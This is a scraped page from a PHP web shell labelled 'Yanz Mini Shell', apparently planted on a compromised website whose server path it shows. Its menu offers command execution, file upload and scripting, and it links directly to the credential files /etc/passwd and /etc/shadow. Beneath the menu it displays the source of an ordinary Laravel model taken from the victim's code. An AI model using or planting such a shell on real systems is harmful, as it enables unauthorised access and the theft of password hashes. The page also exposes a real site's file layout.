Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
pace
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php namespace App; use Illuminate\Database\Eloquent\Model; use Spatie\Activitylog\Traits\LogsActivity; use Spatie\Activitylog\LogOptions; class DocumentAndNote extends Model { use LogsActivity; /** * The attributes that aren't mass assignable. * * @var array */ protected $guarded = ['id']; protected static $logUnguarded = true; protected static $logOnlyDirty = true; /** * Get all of the owning notable models. */ public function notable() { return $this->morphTo(); } public function media() { return $this->morphMany(\App\Media::class, 'model'); } /** * Get the user who added note. */ public function createdBy() { return $this->belongsTo(\App\User::class, 'created_by'); } public function getActivitylogOptions(): LogOptions { return LogOptions::defaults(); } }
Free Space : 11770085376 Byte